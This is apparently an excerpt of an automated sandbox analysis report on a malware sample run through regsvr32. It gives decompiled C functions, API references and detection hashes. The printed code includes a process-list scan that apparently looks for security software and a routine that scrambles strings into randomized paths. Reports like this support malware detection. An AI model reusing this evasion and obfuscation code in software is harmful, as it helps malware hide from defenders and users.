                                                                                                                                                                                                                                    0x023e435e
                                                                                                                                                                                                                                    0x023e4366
                                                                                                                                                                                                                                    0x023e4368
                                                                                                                                                                                                                                    0x023e436c
                                                                                                                                                                                                                                    0x023e436c
                                                                                                                                                                                                                                    0x023e4379
                                                                                                                                                                                                                                    0x023e437d
                                                                                                                                                                                                                                    0x023e4381
                                                                                                                                                                                                                                    0x023e43d6
                                                                                                                                                                                                                                    0x023e43dc
                                                                                                                                                                                                                                    0x023e43dc
                                                                                                                                                                                                                                    0x023e438f
                                                                                                                                                                                                                                    0x023e4393
                                                                                                                                                                                                                                    0x023e43ca
                                                                                                                                                                                                                                    0x023e43cc
                                                                                                                                                                                                                                    0x023e43cf
                                                                                                                                                                                                                                    0x023e43cf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e43cc
                                                                                                                                                                                                                                    0x023e4393
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e437d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E7A9A: lstrlen.KERNEL32(023E23E9,00000000,00000000,00000027,00000005,00000000,00000000,023E96DA,74666F53,00000000,023E23E9,023ED00C,?,023E23E9), ref: 023E7AD0
                                                                                                                                                                                                                                      • Part of subcall function 023E7A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 023E7AF4
                                                                                                                                                                                                                                      • Part of subcall function 023E7A9A: lstrcat.KERNEL32(00000000,00000000), ref: 023E7AFC
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(023ED2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,023E3CA0,?,00000001,?), ref: 023E432B
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,023E3CA0,00000000,00000000,?,00000000,?,023E3CA0,?,00000001,?,?,?,?,023E6880), ref: 023E4389
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,023E3CA0,?,00000001,?), ref: 023E43B7
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,023E3CA0,?,00000001,?,?,?,?,023E6880), ref: 023E43CF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 73268831-0
                                                                                                                                                                                                                                    • Opcode ID: a748e75ba75079baea220e1ace325caa2f58ecfdd9a2cfc402ffb99e9a9106f8
                                                                                                                                                                                                                                    • Instruction ID: f86705229ab76becdcc5bef8c15cc151c10fc28372191f7aaffe321770a26ee6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a748e75ba75079baea220e1ace325caa2f58ecfdd9a2cfc402ffb99e9a9106f8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED21D272A402359BCF315E68AC44B6A73ADAB8C724F050A15FB53DF2C4D771DC2D8690
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023EA0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E023EA0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x23ed144; // 0x23ead81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E023E2049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E023E9039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E023E1C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                                                                                                                                                                                                    0x023ea0b2
                                                                                                                                                                                                                                    0x023ea0b2
                                                                                                                                                                                                                                    0x023ea0bc
                                                                                                                                                                                                                                    0x023ea0c2
                                                                                                                                                                                                                                    0x023ea0c5
                                                                                                                                                                                                                                    0x023ea0c9
                                                                                                                                                                                                                                    0x023ea0d1
                                                                                                                                                                                                                                    0x023ea0d4
                                                                                                                                                                                                                                    0x023ea0ed
                                                                                                                                                                                                                                    0x023ea0f0
                                                                                                                                                                                                                                    0x023ea0f4
                                                                                                                                                                                                                                    0x023ea0f8
                                                                                                                                                                                                                                    0x023ea0f9
                                                                                                                                                                                                                                    0x023ea0fe
                                                                                                                                                                                                                                    0x023ea101
                                                                                                                                                                                                                                    0x023ea108
                                                                                                                                                                                                                                    0x023ea10f
                                                                                                                                                                                                                                    0x023ea162
                                                                                                                                                                                                                                    0x023ea16b
                                                                                                                                                                                                                                    0x023ea16e
                                                                                                                                                                                                                                    0x023ea1a9
                                                                                                                                                                                                                                    0x023ea1af
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023ea16e
                                                                                                                                                                                                                                    0x023ea115
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023ea11c
                                                                                                                                                                                                                                    0x023ea12a
                                                                                                                                                                                                                                    0x023ea12d
                                                                                                                                                                                                                                    0x023ea130
                                                                                                                                                                                                                                    0x023ea13c
                                                                                                                                                                                                                                    0x023ea140
                                                                                                                                                                                                                                    0x023ea1a2
                                                                                                                                                                                                                                    0x023ea142
                                                                                                                                                                                                                                    0x023ea145
                                                                                                                                                                                                                                    0x023ea149
                                                                                                                                                                                                                                    0x023ea14a
                                                                                                                                                                                                                                    0x023ea14b
                                                                                                                                                                                                                                    0x023ea14d
                                                                                                                                                                                                                                    0x023ea154
                                                                                                                                                                                                                                    0x023ea192
                                                                                                                                                                                                                                    0x023ea19d
                                                                                                                                                                                                                                    0x023ea156
                                                                                                                                                                                                                                    0x023ea159
                                                                                                                                                                                                                                    0x023ea15d
                                                                                                                                                                                                                                    0x023ea15d
                                                                                                                                                                                                                                    0x023ea154
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023ea140
                                                                                                                                                                                                                                    0x023ea115
                                                                                                                                                                                                                                    0x023ea0d9
                                                                                                                                                                                                                                    0x023ea0df
                                                                                                                                                                                                                                    0x023ea0e4
                                                                                                                                                                                                                                    0x023ea0e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023ea177
                                                                                                                                                                                                                                    0x023ea17f
                                                                                                                                                                                                                                    0x023ea186
                                                                                                                                                                                                                                    0x023ea186
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76D681D0), ref: 023EA0C9
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 023EA0D9
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EA162
                                                                                                                                                                                                                                      • Part of subcall function 023E1C47: WaitForMultipleObjects.KERNEL32(00000002,023EAA72,00000000,023EAA72,?,?,?,023EAA72,0000EA60), ref: 023E1C62
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 023EA197
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 602384898-0
                                                                                                                                                                                                                                    • Opcode ID: 4ecbe3f8bd09a837c6067401f0d1cc788c562256597ce903bb53219328acdd60
                                                                                                                                                                                                                                    • Instruction ID: 78501847fd5d051c4ac1c053c6b5630b96ef65d5106a8f3afedcb12e28215e20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ecbe3f8bd09a837c6067401f0d1cc788c562256597ce903bb53219328acdd60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E31E9B5D00318EFEF21DF95C8809AEBBBDFB08344F10496AE542E6581D770AA49DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E3BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                                                                                                                    			E023E3BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E023E9763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E023EA022(_t23);
						}
					}
					return _t38;
				}
				if(E023EA72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x23ed2a8, 1, 0,  *0x23ed344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E023E8A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E023E17D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E023E1F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E023E42EA( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                                                                                                                                    0x023e3bf1
                                                                                                                                                                                                                                    0x023e3bfe
                                                                                                                                                                                                                                    0x023e3c04
                                                                                                                                                                                                                                    0x023e3c05
                                                                                                                                                                                                                                    0x023e3c06
                                                                                                                                                                                                                                    0x023e3c07
                                                                                                                                                                                                                                    0x023e3c08
                                                                                                                                                                                                                                    0x023e3c0c
                                                                                                                                                                                                                                    0x023e3c18
                                                                                                                                                                                                                                    0x023e3c1c
                                                                                                                                                                                                                                    0x023e3ca4
                                                                                                                                                                                                                                    0x023e3ca4
                                                                                                                                                                                                                                    0x023e3ca7
                                                                                                                                                                                                                                    0x023e3ca9
                                                                                                                                                                                                                                    0x023e3cb1
                                                                                                                                                                                                                                    0x023e3cb1
                                                                                                                                                                                                                                    0x023e3cb7
                                                                                                                                                                                                                                    0x023e3cba
                                                                                                                                                                                                                                    0x023e3cba
                                                                                                                                                                                                                                    0x023e3cb7
                                                                                                                                                                                                                                    0x023e3cc5
                                                                                                                                                                                                                                    0x023e3cc5
                                                                                                                                                                                                                                    0x023e3c2f
                                                                                                                                                                                                                                    0x023e3c31
                                                                                                                                                                                                                                    0x023e3c31
                                                                                                                                                                                                                                    0x023e3c48
                                                                                                                                                                                                                                    0x023e3c4c
                                                                                                                                                                                                                                    0x023e3c4f
                                                                                                                                                                                                                                    0x023e3c5a
                                                                                                                                                                                                                                    0x023e3c61
                                                                                                                                                                                                                                    0x023e3c61
                                                                                                                                                                                                                                    0x023e3c6d
                                                                                                                                                                                                                                    0x023e3c6e
                                                                                                                                                                                                                                    0x023e3c7c
                                                                                                                                                                                                                                    0x023e3c70
                                                                                                                                                                                                                                    0x023e3c70
                                                                                                                                                                                                                                    0x023e3c71
                                                                                                                                                                                                                                    0x023e3c72
                                                                                                                                                                                                                                    0x023e3c73
                                                                                                                                                                                                                                    0x023e3c74
                                                                                                                                                                                                                                    0x023e3c75
                                                                                                                                                                                                                                    0x023e3c75
                                                                                                                                                                                                                                    0x023e3c81
                                                                                                                                                                                                                                    0x023e3c86
                                                                                                                                                                                                                                    0x023e3c88
                                                                                                                                                                                                                                    0x023e3c8a
                                                                                                                                                                                                                                    0x023e3c8a
                                                                                                                                                                                                                                    0x023e3c91
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3c93
                                                                                                                                                                                                                                    0x023e3c93
                                                                                                                                                                                                                                    0x023e3ca0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3ca0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(023ED2A8,00000001,00000000,00000040,00000001,?,76D7F710,00000000,76D7F730,?,?,?,023E6880,?,00000001,?), ref: 023E3C42
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,023E6880,?,00000001,?,00000002,?,?,023E2417,?), ref: 023E3C4F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,023E6880,?,00000001,?,00000002,?,?,023E2417,?), ref: 023E3C5A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,023E6880,?,00000001,?,00000002,?,?,023E2417,?), ref: 023E3C61
                                                                                                                                                                                                                                      • Part of subcall function 023E8A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,023E3C81,?,023E3C81,?,?,?,?,?,023E3C81,?), ref: 023E8B2B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2559942907-0
                                                                                                                                                                                                                                    • Opcode ID: cf4e9e5ce784e58557d955fc10ed8e33c16f28327403ee2f73b5b6d9e49bb841
                                                                                                                                                                                                                                    • Instruction ID: b29667d8cf4fd43eadd83084bff9993a169fd25f4265f2d7e19046cc03aeb432
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf4e9e5ce784e58557d955fc10ed8e33c16f28327403ee2f73b5b6d9e49bb841
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD216D72D002299BCF20AFE484849FE777DAF48354B054865E913A71C0D774DD8DCBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E023E788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x23ed238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x23ed250; // 0x5977891f
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x23ed250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                                                                                                                                    0x023e7893
                                                                                                                                                                                                                                    0x023e7896
                                                                                                                                                                                                                                    0x023e789c
                                                                                                                                                                                                                                    0x023e78b4
                                                                                                                                                                                                                                    0x023e78b8
                                                                                                                                                                                                                                    0x023e78bb
                                                                                                                                                                                                                                    0x023e78bd
                                                                                                                                                                                                                                    0x023e78c0
                                                                                                                                                                                                                                    0x023e78c2
                                                                                                                                                                                                                                    0x023e78c5
                                                                                                                                                                                                                                    0x023e78c7
                                                                                                                                                                                                                                    0x023e78c7
                                                                                                                                                                                                                                    0x023e78c9
                                                                                                                                                                                                                                    0x023e78d4
                                                                                                                                                                                                                                    0x023e78d9
                                                                                                                                                                                                                                    0x023e78ea
                                                                                                                                                                                                                                    0x023e78f2
                                                                                                                                                                                                                                    0x023e78f7
                                                                                                                                                                                                                                    0x023e78fa
                                                                                                                                                                                                                                    0x023e78fd
                                                                                                                                                                                                                                    0x023e78ff
                                                                                                                                                                                                                                    0x023e7905
                                                                                                                                                                                                                                    0x023e7908
                                                                                                                                                                                                                                    0x023e7908
                                                                                                                                                                                                                                    0x023e7908
                                                                                                                                                                                                                                    0x023e7913
                                                                                                                                                                                                                                    0x023e7918
                                                                                                                                                                                                                                    0x023e7922

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,023E839A,00000000,?,?,023EA428,?,04CC95B0), ref: 023E7896
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 023E78AE
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,023E839A,00000000,?,?,023EA428,?,04CC95B0), ref: 023E78F2
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000001,?,00000001), ref: 023E7913
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                                                    • Opcode ID: 6ed5fd27014142ed7b02587ce9b6171e3acae781fd754fef36b2f4ba58726cc8
                                                                                                                                                                                                                                    • Instruction ID: 11fd1dde20a3ce3ab5f5f0fc15c94903b8d8970d7418743f1937abd9abf0b7fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed5fd27014142ed7b02587ce9b6171e3acae781fd754fef36b2f4ba58726cc8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311CAB2E40115EFCB208A69DC84D9EBBEEDB95350F050566F5069B1C0E770DE18C750
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E7A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E023E7A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E023E6B43(_t8, _t1);
				_t16 = E023E2049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E023E86D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E023E2049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E023E9039(_t16);
				}
				return _t18;
			}









                                                                                                                                                                                                                                    0x023e7aa5
                                                                                                                                                                                                                                    0x023e7aa6
                                                                                                                                                                                                                                    0x023e7aa9
                                                                                                                                                                                                                                    0x023e7aab
                                                                                                                                                                                                                                    0x023e7ab6
                                                                                                                                                                                                                                    0x023e7aba
                                                                                                                                                                                                                                    0x023e7abf
                                                                                                                                                                                                                                    0x023e7ac3
                                                                                                                                                                                                                                    0x023e7acb
                                                                                                                                                                                                                                    0x023e7ad0
                                                                                                                                                                                                                                    0x023e7ad8
                                                                                                                                                                                                                                    0x023e7ad8
                                                                                                                                                                                                                                    0x023e7ae1
                                                                                                                                                                                                                                    0x023e7ae5
                                                                                                                                                                                                                                    0x023e7aeb
                                                                                                                                                                                                                                    0x023e7aee
                                                                                                                                                                                                                                    0x023e7af4
                                                                                                                                                                                                                                    0x023e7af4
                                                                                                                                                                                                                                    0x023e7afc
                                                                                                                                                                                                                                    0x023e7afc
                                                                                                                                                                                                                                    0x023e7b03
                                                                                                                                                                                                                                    0x023e7b03
                                                                                                                                                                                                                                    0x023e7b0e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                      • Part of subcall function 023E86D8: wsprintfA.USER32 ref: 023E8734
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(023E23E9,00000000,00000000,00000027,00000005,00000000,00000000,023E96DA,74666F53,00000000,023E23E9,023ED00C,?,023E23E9), ref: 023E7AD0
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 023E7AF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 023E7AFC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: Soft
                                                                                                                                                                                                                                    • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                    • Opcode ID: 55d5fb6826479e230663fb1d93d2ee84065a4cdcf0daf8e965ba891aee17e7c7
                                                                                                                                                                                                                                    • Instruction ID: 637da58e7bf24c0842a098967e62aa3f00646a78e0ed4cef7b016491d0f56ae9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55d5fb6826479e230663fb1d93d2ee84065a4cdcf0daf8e965ba891aee17e7c7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D01A77250022AE7CF22BAA59C84AEF7B6DEF84359F044422F906591C0DB75CE4DCBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E023E757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x23ed27c; // 0x28da5a8
						_t2 = _t9 + 0x23eee54; // 0x73617661
						_push( &_v264);
						if( *0x23ed0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                                                                                                                                    0x023e758a
                                                                                                                                                                                                                                    0x023e7594
                                                                                                                                                                                                                                    0x023e7598
                                                                                                                                                                                                                                    0x023e75a2
                                                                                                                                                                                                                                    0x023e75d3
                                                                                                                                                                                                                                    0x023e75a9
                                                                                                                                                                                                                                    0x023e75ae
                                                                                                                                                                                                                                    0x023e75bb
                                                                                                                                                                                                                                    0x023e75c4
                                                                                                                                                                                                                                    0x023e75db
                                                                                                                                                                                                                                    0x023e75c6
                                                                                                                                                                                                                                    0x023e75ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e75ce
                                                                                                                                                                                                                                    0x023e75dc
                                                                                                                                                                                                                                    0x023e75dd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e75dd
                                                                                                                                                                                                                                    0x00000000
